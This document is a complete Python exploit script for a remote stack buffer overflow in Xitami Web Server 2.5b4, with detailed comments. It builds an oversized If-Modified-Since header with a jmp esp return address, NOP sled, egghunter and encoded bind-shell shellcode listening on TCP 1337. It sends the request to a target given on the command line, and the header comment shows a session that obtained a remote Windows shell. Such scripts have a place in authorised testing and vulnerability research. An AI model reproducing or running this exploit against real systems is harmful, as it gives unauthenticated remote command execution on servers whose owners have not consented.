Xitami Web Server 2.5 Buffer Overflow (remote, egghunter-based, Windows XP SP3 English target)
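# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)
# Date: June 4, 2011
# Author: Glafkos Charalambous
# Version: 2.5b4
# Tested on: Windows XP SP3 En
# Discovered by: Krystian Kloskowski
#
# root@bt:~/Desktop# python xitami.py 192.168.0.24 80
# [+] Connected
# [+] Sending payload...
# [+] Check Port 1337 for your shell
# root@bt:~/Desktop# telnet 192.168.0.24 1337
# Trying 192.168.0.24...
# Connected to 192.168.0.24.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Xitami>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#         Connection-specific DNS Suffix  . :
#         IP Address. . . . . . . . . . . . : 192.168.0.24
#         Subnet Mask . . . . . . . . . . . : 255.255.255.0
#         Default Gateway . . . . . . . . . : 192.168.0.1
#
# C:\Xitami>
"""Xitami 2.5b4 remote stack overflow via an oversized If-Modified-Since header.

How the payload is laid out (see build_overflow):

  72 bytes of filler -> saved EIP overwritten with a ``jmp esp`` gadget ->
  a short forward jump into a NOP sled -> a 32-byte egghunter -> the 8-byte
  egg tag -> the bind-shell shellcode.

The egghunter is used because the shellcode is too large to be reliably
placed where the overwritten return address lands; the hunter scans process
memory for the tag and jumps to whatever follows it.

Operational caveats a tester should know before running this:

* The ``jmp esp`` address is taken from user32.dll on Windows XP SP3
  *English*; on any other OS/service-pack/language build it will be wrong
  and the service will simply crash.
* The payload is an unauthenticated bind shell on TCP/1337 — anyone who
  can reach that port gets a shell in the web server's security context.
  Use only on isolated lab hosts.
* The shellcode was generated with ``exitfunc=process``: exiting the
  shell should terminate the hosting process, i.e. the web server goes
  down (expected behaviour of that msfpayload option; confirm on target).

Every byte in the overflow portion avoids ``\\x00``, ``\\x0a`` and
``\\x0d`` (the encoder bad-chars), since any of those would end the header
value early during request parsing.
"""

import socket
import sys
import time

# 4-byte egg tag; the hunter looks for two consecutive copies.
EGG = b"w00t"

# 32-byte egghunter. It probes memory page by page with a kernel syscall
# (push 2 / pop eax / int 0x2e) to avoid faulting on unmapped pages, then
# compares two consecutive dwords against EGG and jumps past them.
# NOTE(review): the syscall number used here is the XP-era variant; it is
# not portable to other Windows versions without adjustment.
EGGHUNTER = (
    b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"
    b"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
    + EGG +  # mov eax, <tag>
    b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
)

# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | \
#   ./msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -c 7 -t c
SHELLCODE = (
    b"\xba\xa2\xcf\xad\x8d\xdb\xd1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
    b"\x7e\x83\xee\xfc\x31\x56\x11\x03\x56\x11\xe2\x57\x70\xe4\x08"
    b"\x09\x2d\x2e\xd1\xec\x46\xf5\x22\x56\x96\x3c\x7b\x1e\x5b\x7e"
    b"\x78\xef\x23\x71\x82\x3e\x5f\xf1\xd3\x58\x3b\x53\x30\xe6\xbc"
    b"\x82\xb3\xba\xf5\xdf\x9e\x21\x78\xcd\x8d\x25\x87\x5b\xd4\xfd"
    b"\x6c\xcd\xcf\x7b\x68\x84\x3d\x07\xcb\x1e\x1b\x06\x11\x31\xfd"
    b"\x90\x27\xff\xe6\x22\x4d\xdd\x1a\xc9\xe1\x93\x45\x4b\x13\x48"
    b"\x74\xcc\x45\x07\x95\xd1\x38\xde\xa3\xef\x7d\x68\xb0\xd1\x67"
    b"\x60\xe5\x89\xb5\xf7\x3e\x2f\x49\xd7\xb8\xc0\xc6\x1b\xfc\xe2"
    b"\xbb\xc8\xae\x39\x78\x81\x4d\xc4\x1c\x2d\x16\x6d\xc3\x04\xde"
    b"\x58\x43\x4e\xc5\x60\x46\x4b\xc9\x79\xfb\x32\xdd\x46\xb8\xd4"
    b"\x61\x62\x92\xf6\xe8\x7b\xe8\x41\xc0\xee\xe2\xbb\x64\x6c\xb8"
    b"\x43\x2d\xfd\xda\x61\xb0\x7c\xe6\x36\xab\x3e\x7a\x80\xe6\x60"
    b"\x2b\x52\x1d\x53\xed\xb4\x94\x86\x8b\x66\x26\x56\x67\xe0\x7c"
    b"\xfb\x1c\xb9\x4f\x75\x4e\x7d\x63\xac\xbc\x7e\x90\xfd\xa1\xb2"
    b"\x6b\x06\xb4\x92\x1f\x90\x26\x1a\x4f\x3d\x18\xa2\x3c\x72\x0f"
    b"\x93\x37\xf7\xf3\x5a\x7f\x33\xbf\x9f\xc2\xea\xb9\x13\x6c\x77"
    b"\xb6\xd4\xc0\x37\x86\x78\xd3\x86\x8c\x9f\x3a\x0f\xb1\x5e\x0f"
    b"\xb9\x09\xf1\x0c\xe9\x2f\xb7\xd7\xea\x37\x4f\x6a\xc3\xdb\x7b"
    b"\x48\x32\x05\xd4\x48\xcc\x47\x59\x41\xc5\x0b\xf5\x02\xeb\x06"
    b"\x7f\xae\x25\x2b\x16\x2d\x51\x18\x91\x9c\x96\x32\x17\x1c\x6e"
    b"\x95\xb9\x4e\xf5\xa6\x29\x8b\x30\x48\x07\x55\xf1\xe4\xa8\xe2"
    b"\x4d\xe0\x6a\xef\xd3\x4e\x07\x4d\xb2\x25\xe0\xb2\x33\x1b\xdc"
    b"\x50\xac\x59\x35\xd9\x91\x9c\x44\x5a\xc1\x52\x19\x0f\x03\xc9"
    b"\x1d\x71\xe5\x79\x54\x3d\xc0\x87\x4d\x9f\x9d\x69\x09\xd4\x6b"
    b"\xe2\xa5\xe0\x77\xd0\xb9\xbd\x85\xd0\x35\xcb\x59\x78\x22\xf2"
    b"\x25\x78\x64\xf6\x2a\x8d\x3e\xc8\xce\x7c\x6f\x64\x24\xb4\x2c"
    b"\x14\xd5\xff\x9c\x84\x40\xf1\x74\xcf\x3c\x4f\xac\x2c\xe2\xae"
    b"\xaa\xaf\xb0\xcf\xc8\x31\x30\xb3\xb0\x8b\x08\x25\x2d\x95\x3d"
    b"\xf5\x0c\x1f\x23\xd9\x87\x31\x79\xd2\x8d\xad\x59\xdd\xb0\x4c"
    b"\xa4\x17\xeb\x97\xb0\x90\x3c\x45\xb7\x3f\x2b\x04\xf3\xc6\xe8"
    b"\x56\x25\x7a\xfd\x6e\x3b\xef\x64\x14\x9b\x67\x08\x9c\x47\x73"
    b"\x24\x1e\x1e\xc6\xd2\xad\xcc\x0c\xc8\xbb\x4e\x12\xde\xf5\x35"
    b"\x25\xe0\xb0\xef\x04\xb5\x29\x62\xc6\x56\x44\x52\x16\xa3\x63"
    b"\x63\xcd\xd1\xc9\x45\x87\x3b\xd6\x4b\x7a\x24\xd5\xd4\x7d\x4c"
    b"\x83\x06\x16\x88\x7f"
)

# Bytes the encoder was told to avoid; a request header value cannot carry them.
BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")

# Bytes of filler before the saved return address is overwritten.
OFFSET_TO_EIP = 72

# jmp esp in user32.dll — Windows XP SP3 English ONLY. Re-find for any other build.
JMP_ESP = b"\xD7\x30\x9D\x7C"

# jmp short +0x22: lands 34 bytes into the 50-byte NOP sled below, which
# then slides execution into the egghunter.
SHORT_JUMP = b"\xeb\x22"
NOP_SLED = b"\x90" * 50

# Port the bind shell listens on (lport in the msfpayload command above).
BIND_PORT = 1337


def build_overflow():
    """Return the bytes placed in the If-Modified-Since value.

    Layout: filler -> jmp esp -> short jump -> NOP sled -> egghunter ->
    egg tag (EGG twice) -> shellcode. The hunter transfers control to the
    first byte after the doubled tag, i.e. to SHELLCODE.
    """
    return b"".join([
        b"A" * OFFSET_TO_EIP,
        JMP_ESP,
        SHORT_JUMP,
        NOP_SLED,
        EGGHUNTER,
        EGG + EGG,  # 8-byte tag the hunter scans for
        SHELLCODE,
    ])


def build_request(target):
    """Return the full HTTP request that triggers the overflow.

    :param target: host name or address for the Host header (str or bytes).
    :returns: bytes, CRLF-terminated lines and an empty line ending the
              header block as HTTP/1.1 requires.
    """
    host = target if isinstance(target, bytes) else target.encode("ascii")
    return b"".join([
        b"GET / HTTP/1.1\r\n",
        b"Host: " + host + b"\r\n",
        b"If-Modified-Since: pwned, " + build_overflow() + b"\r\n",
        b"\r\n",
    ])


def exploit(target, port):
    """Connect to target:port, send the malicious request and close.

    :returns: True when the payload was sent, False when the TCP connect
              failed. The socket is always closed, including on send errors.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target, port))
    except socket.error:
        sock.close()
        print("[!] Connection Failed")
        return False
    print("[+] Connected")
    try:
        print("[+] Sending payload...")
        # sendall: the request is a few hundred bytes but send() may still
        # write it partially on some stacks.
        sock.sendall(build_request(target))
        # Give the server a moment to consume the request before we drop the
        # connection, so it is not torn down while the header is being parsed.
        time.sleep(1)
    finally:
        sock.close()
    print("[+] Check port %d for your shell" % BIND_PORT)
    return True


def main(argv):
    """Command-line entry point: ``xitami.py <Target IP> <Target Port>``."""
    if len(argv) != 3:
        print("Usage: ./xitami.py <Target IP> <Target Port>")
        sys.exit(1)
    target = argv[1]
    port = int(argv[2])
    # Non-zero exit on a failed connect so scripted runs can detect it
    # (the original exited 0 here).
    if not exploit(target, port):
        sys.exit(1)


if __name__ == "__main__":
    main(sys.argv)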
